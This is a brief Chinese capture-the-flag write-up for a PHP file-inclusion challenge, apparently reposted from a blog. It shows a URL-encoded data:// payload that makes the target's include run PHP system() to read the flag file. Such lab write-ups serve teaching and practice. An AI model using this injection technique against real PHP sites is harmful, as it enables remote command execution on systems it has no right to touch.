web3
题目
更简单的web题
分析
代码出现 include,猜测是文件包含漏洞。
通过 data:// 数据流 + php 命令执行函数查询当前工作目录下的内容,使用 hackbar 需要先进行 url 编码:
得到 flag 文件名和首页文件:
?url=data://text/plain,%3C%3Fphp%0Asystem('cat ctf_go_go_go')%3B%0A%3F%3E 打开 flag 文件,得到 flag 内容。
参考
Web_XCTF_WriteUp | Web_php_include-Guanz-博客园
标签:Web,web3,flag,go,test,php From: https://www.cnblogs.com/Guanz/p/18308386